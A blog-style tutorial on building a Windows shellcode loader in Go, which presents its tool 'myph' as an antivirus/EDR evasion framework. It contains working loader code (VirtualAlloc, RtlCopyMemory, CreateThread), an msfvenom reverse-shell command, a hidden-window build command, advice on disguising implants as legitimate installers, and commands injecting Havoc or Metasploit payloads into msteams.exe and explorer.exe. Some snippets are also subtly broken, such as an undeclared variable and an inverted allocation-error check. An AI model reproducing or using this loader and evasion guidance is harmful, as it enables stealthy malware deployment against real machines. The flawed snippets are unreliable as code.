writing a shellcode-loader with Golang

I don’t know what it is about me and travelling, but I always end up writing malware instead of enjoying my vacation. This time, I’m in Japan and I decided to pick up an “old” project,

In this post, I will describe what I’ve learned through this project, and what you should maybe know about before attempting your own.

What is a Loader ?

Let’s start with the basics.

A shellcode loader is a piece of software designed to execute shellcode within a computer’s RAM. To understand what a shellcode loader does, we need to break it down into smaller parts:

Shellcode: a small piece of low-level code, usually written in assembly language, that performs a specific task. It is called “shellcode” because it often provides a shell (command-line interface) to interact with the system. This code is used for various purposes, including exploiting security vulnerabilities, or performing other malicious actions.
Loader: a program responsible for loading other programs or pieces of code into memory and preparing them for execution. It handles tasks such as allocating memory, copying the code into the allocated space, and setting up the execution environment.

It’s commonly used in the context of cybersecurity, penetration testing, and red teaming.

Here’s a high-level overview of how a shellcode loader works:

Payload Generation: First, the shellcode needs to be crafted or generated. This involves writing the assembly instructions that will perform the desired action, such as opening a shell, creating a backdoor, or exploiting a vulnerability. Of course, you can also write it in a higher-level language too.
Injection: The program copies, sets up memory and execution context. It might achieve this through various techniques, such as injecting the shellcode into an existing process.
Execution: Once everything is ready, the loader transfers control to the shellcode, effectively executing it. Various ways to trigger the execution exist, more or less stealthy depending on the target machine.

The point of a loader is to be able to use and re-use a lot of different pieces of malware, and sometimes even combine them. This makes campaigns easier, as you can reuse code that has been discovered before, and just focus on avoiding detection. You should aim for inter-operability between tools, so that your loader can be combined with other projects, and support many different types of shellcode.

For instance, let’s say you are on a Red Team assignment, and you wish to use Havoc. But being a well-known Open-source tool, it is detected by a lot of anti-virus software… :/

So, what you do is the following:

you retrieve the executable part out of your Havoc agent, and you put it through a coat of paint, in order to hide the fact that it’s really a Havoc agent, and not the Minecraft installer you are pretending to be.

Attempting to be undetected by all anti-virus software is pointless, you should instead model your agent for a specific environment

eg: if you know your target is using BitDefender, that should be what you are trying to evade. Things dont stay fully undetected for long, and that’s the point of a loader !

If you get detected, you can just (in theory) re-use the same shellcode, but with a different loading method and boom: fresh implant.

Here is a couple of loaders you can study, if you want to learn more about it:

You may find here relevant documentation if you want to write your own stuff:

ired.team: details a lot of process-injection techniques, which is most common way of executing shellcode on Windows AFAIK,
msfvenom hacktrickz: details basic use of msfvenom, which you will use to test your create your first shellcodes,
MSDN docs: technical documentation for Windows Win32 API functions, which you will use a lot,
crow’s nest: helpful notes on all things related to malware. He’s also got a good youtube channel,
vergilius: Take a look at Windows undocumented structures (such as PEB and TEB)

I have also started creating a Youtube playlist with interesting talks & useful beginner information. Feel free to watch it (preferably in order) !

Writing your own loader

Now that you have understood what is a loader, read some documentation, and looked at a few projects, you feel confident you can attempt this. Let’s go over what you need before getting fully started.

Standard advice

As with any software project, generic advice applies:

don’t over-engineer shit,
don’t be afraid to fail or to debug something,
keep it simple and grow your software organically, write something when you need it,
choose a language you are comfortable with, this subject is sufficiently complicated as it is.

This could also apply:

avoid relative paths, so it can be used from any directory,
minimize external dependencies.

Measuring your project’s success really depends on why you got started with it in the first place. For me, the goal has always been to learn about Windows, Process Injection stuff, and malware in general. If it is useful to the community, even better! But the main goal has always been to learn.

It is very important when starting a project to know why you are doing this. It keeps you motivated and focused on your goal.

Win32 API

It’s the most straight-forward way to talk to the Windows kernel from userland. As mentioned before, the documentation is really thorough, although some parts (especially the most interesting ones!) are sometimes (purposefully ?) undocumented.

Through various community efforts such as ReactOS, you can still get an idea of what this function or this structure does but it’s important for you to understand that those efforts can be imperfect or out of date.

Testing methods

The most simple way is to install a barebones Windows VM, with a shared directory to your project on your host machine. Then, do a snapshot for each Anti-virus you wish to test against. Of course, you should do this before testing your malware on your virtual machine.

It can be a good idea to turn off internet access.

Also, setting resource limits can be very helpful. Memory leaks or bugs can increase resource usage and eventually crash the VM. If you have resource limits set, you would not have to worry about this.

Disabling automatic updates is also nice. It guarantees that the system will not unexpectedly change while testing. This means you will have to do the Security updates manually, which you should. However, deciding when you can update is important, as unexpected changes can be very confusing if you expect a particular behavior, and lead you to debug the wrong thing.

On the various payloads you should test

Finally, be sure to test against a variety of tools. Some payloads may execute while others will die in the background. You need to make sure your software is stable before using it against your target.

Let’s go over an example. Here, we will use CreateThread() to trigger the execution of a shellcode which will be mapped in memory by VirtualAlloc():

package main

import (
	"fmt"
	"syscall"
	"unsafe"

	"golang.org/x/sys/windows"
)

const (
	MEM_COMMIT             = 0x1000
	MEM_RESERVE            = 0x2000
	PAGE_EXECUTE_READWRITE = 0x40
)

var (
	kernel32 = windows.MustLoadDLL("kernel32.dll")
	ntdll    = windows.MustLoadDLL("ntdll.dll")

	VirtualAlloc  = kernel32.MustFindProc("VirtualAlloc")
	RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")
	CreateThread  = kernel32.MustFindProc("CreateThread")
)


func main() {

    /* lets say this contains any array of bytes */
	var shellcode []byte

    /*
        for simplicity, we will not worry about error
        handling for now
    */

	addr, _, _ := VirtualAlloc.Call(
		0,
		uintptr(len(shellcode)),
		MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE,
	)

	_, _, _ = RtlCopyMemory.Call(
		addr,
		(uintptr)(unsafe.Pointer(&shellcode[0])),
		uintptr(len(shellcode)),
	)

	// jump to shellcode
	_, _, err = CreateThread.Call(
		0,    // [in, optional]  LPSECURITY_ATTRIBUTES,
		0,    // [in]            SIZE_T,
		addr, // shellcode address
		0,    // [in, optional]  __drv_aliasesMem LPVOID,
		0,    // [in]            DWORD,
		0,    // [out, optional] LPDWORD
	)
}

If you test this with the following payload, it will work fine:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.2.2 LPORT=1234

Having a socket bound and calling back to you will prevent the process from exiting as long as the socket exists. However, lets say you want to use a C2 implant instead, one that sends requests (with the HTTP protocol, for instance). It will open and close sockets many times, and will not be constrained by a single TCP socket like metasploit’s shell_reverse_tcp.

In this case, it will not work because, as you dont wait for the thread to finish, the process will just die as soon as the newly created thread is in a waiting state.

You could fix this by using the following code at the end, but both have issues:

/* . . . */

func main() {


    /* . . . */

	_, _, err = CreateThread.Call(
		0,    // [in, optional]  LPSECURITY_ATTRIBUTES,
		0,    // [in]            SIZE_T,
		addr, // shellcode address
		0,    // [in, optional]  __drv_aliasesMem LPVOID,
		0,    // [in]            DWORD,
		0,    // [out, optional] LPDWORD
	)


    /*
        doing this sucks because CPU usage will go
        through the roof and you will get noticed for sure
    */
    for {

    }


    /*
        doing this sucks, as it can deadlock the program
    */
    select {

    }
}

The solution is to use the Win32 API to fix this, since it is what you used to create the thread in the first place:


/* . . . */

var (
	kernel32        = syscall.MustLoadDLL("kernel32.dll")

    /* . . . */

    WaitForSingleObject = kernel32.MustFindProc(
        "WaitForSingleObject"
    )
)


func main() {


    /* . . . */

	threadAddr, _, err = CreateThread.Call(
		0,    // [in, optional]  LPSECURITY_ATTRIBUTES,
		0,    // [in]            SIZE_T,
		addr, // shellcode address
		0,    // [in, optional]  __drv_aliasesMem LPVOID,
		0,    // [in]            DWORD,
		0,    // [out, optional] LPDWORD
	)


    /*
        wait for thread indefinitely

        there are other techniques to do this, but this is
        the most well known AFAIK
    */
    WaitForSingleObject.Call(
        threadAddr,
        0xFFFFFFFF,
    )
}

Writing Golang malware

pros and cons

I decided to write my loader in Golang for a few reasons:

it is statically compiled, you will not have to worry about dependencies on the target machine,
the standard library supports a lot of stuff, which makes it easy to write something quickly,
it cross-compiles which makes it easier to get a simple dev environnement,
easy package management, code formatting, etc (present out of the box)

However, it is not the perfect malware-writing language obviously:

as it compiles statically, this means the size of your final payload is quite heavy,
lots of artefacts are left in a Golang binary, which could reveal information you do not want to reveal about the program.

no language is perfect. If someone argues with you that this language is better than the other without providing concrete examples, they most likely don’t know what they’re actually talking about.

just pick what you like and enjoy yourself

A couple of quirks

Compiling your malware

In order to avoid showing little windows or printing output to the screen, here is the command you should use to compile your final payload:

GOOS=windows go build -ldflags "-s -w -H=windowsgui" -o payload.exe your_source_code.go

anything you print to stdout will be nullified, keep that in mind when debugging your payload !

Error handling using the Win32 API

Checking for errors in Golang is usually done like so:

func someFunction() {
    something, err := SomethingThatCouldFail()
    if err != nil {
        panic(err)
    }
}

However, this is not exactly how things work with the Win32 API. This is how it would look like, if we did this with our example from before:

package main

import (
	"fmt"
	"syscall"
	"unsafe"

	"golang.org/x/sys/windows"
)

const (
	MEM_COMMIT             = 0x1000
	MEM_RESERVE            = 0x2000
	PAGE_EXECUTE_READWRITE = 0x40
)

var (
	kernel32 = windows.MustLoadDLL("kernel32.dll")
	ntdll    = windows.MustLoadDLL("ntdll.dll")

	VirtualAlloc  = kernel32.MustFindProc("VirtualAlloc")

    /* . . . */
)

func main() {

	var shellcode []byte
	shellcode = decrypt(shellcodeBytes, key)

	addr, _, err := VirtualAlloc.Call(
		0,
		uintptr(len(shellcode)),
		MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE,
	)

    /*
        Checking the error message we got from the `err`
        object (in French, in this case)
    */
	if err != nil && err.Error() != "L’opération a réussi." {
		fmt.Println("failed to alloc memory")
		fmt.Println(err)
		syscall.Exit(0)
	}

    /* . . . */

}

You can see the problem, right ? If the target machine is not in French, we will fall into the if statement and exit the program. But maybe our VirtualAlloc() succeeded !

To properly check for errors, here is what you should do:

package main

import (
	"fmt"
	"syscall"
	"unsafe"

	"golang.org/x/sys/windows"
)

const (
	MEM_COMMIT             = 0x1000
	MEM_RESERVE            = 0x2000
	PAGE_EXECUTE_READWRITE = 0x40
)

var (
	kernel32 = windows.MustLoadDLL("kernel32.dll")
	ntdll    = windows.MustLoadDLL("ntdll.dll")

	VirtualAlloc  = kernel32.MustFindProc("VirtualAlloc")

    /* . . . */
)

func main() {

	var shellcode []byte

	addr, _, err := VirtualAlloc.Call(
		0,
		uintptr(len(shellcode)),
		MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE,
	)

    /*
        Checking the return value of the call,
        and retrieving the error if any
    */
	if addr != 0{
		fmt.Println("failed to alloc memory")
        panic(err)
	}

    /* . . . */

}

This way, you can check for errors on any system, and Golang even gives you a nice error message instead of the error code.

Presenting `myph`

In order to finish this blog post, I wish to present my project (which is still a work in progress), called myph (version 1.1.0 at the time of writing).

You can get it on Github, or through the go package repository. Its usage is well-described by the --help section:

              ...                                        -==[ M Y P H ]==-
             ;::::;
           ;::::; :;                                    In loving memory of
         ;:::::'   :;                               Wassyl Iaroslavovytch Slipak
        ;:::::;     ;.
       ,:::::'       ;           OOO                       (1974 - 2016)
       ::::::;       ;          OOOOO
       ;:::::;       ;         OOOOOOOO
      ,;::::::;     ;'         / OOOOOOO
    ;::::::::: . ,,,;.        /  / DOOOOOO
  .';:::::::::::::::::;,     /  /     DOOOO
 ,::::::;::::::;;;;::::;,   /  /        DOOO        AV / EDR evasion framework
; :::::: '::::::;;;::::: ,#/  /          DOOO           to pop shells and
: ::::::: ;::::::;;::: ;::#  /            DOOO        make the blue team cry
:: ::::::: ;:::::::: ;::::# /              DOO
 : ::::::: ;:::::: ;::::::#/               DOO
 ::: ::::::: ;; ;:::::::::##                OO       written with <3 by djnn
 :::: ::::::: ;::::::::;:::#                OO                ------
 ::::: ::::::::::::;' :;::#                O             https://djnn.sh
   ::::: ::::::::;  /  /  :#
   :::::: :::::;   /  /    #

Usage:
  myph [flags]

Flags:
  -e, --encryption encKind   encryption method. (allowed: AES, chacha20, XOR, blowfish) (default AES)
  -h, --help                 help for myph
  -k, --key string           encryption key, auto-generated if empty. (if used by --encryption)
  -f, --out string           output name (default "payload.exe")
  -p, --process string       target process to inject shellcode to (default "cmd.exe")
  -s, --shellcode string     shellcode path (default "msf.raw")
      --sleep-time uint      sleep time in seconds before executing loader (default: 0)
  -t, --technique string     shellcode-loading technique (allowed: CRT, ProcessHollowing, CreateThread, Syscall) (default "CRT")
  -v, --version              version for myph

Here are a few examples of how you can use it:

# inject a havoc payload into microsoft teams using the method from before !
> myph --shellcode havoc.x64.bin --process msteams.exe --technique CreateThread --encryption chacha20

# inject a MSF payload into explorer.exe to get a TCP or meterpreter callback
> myph --shellcode msf.raw --process explorer.exe

See you next time :)~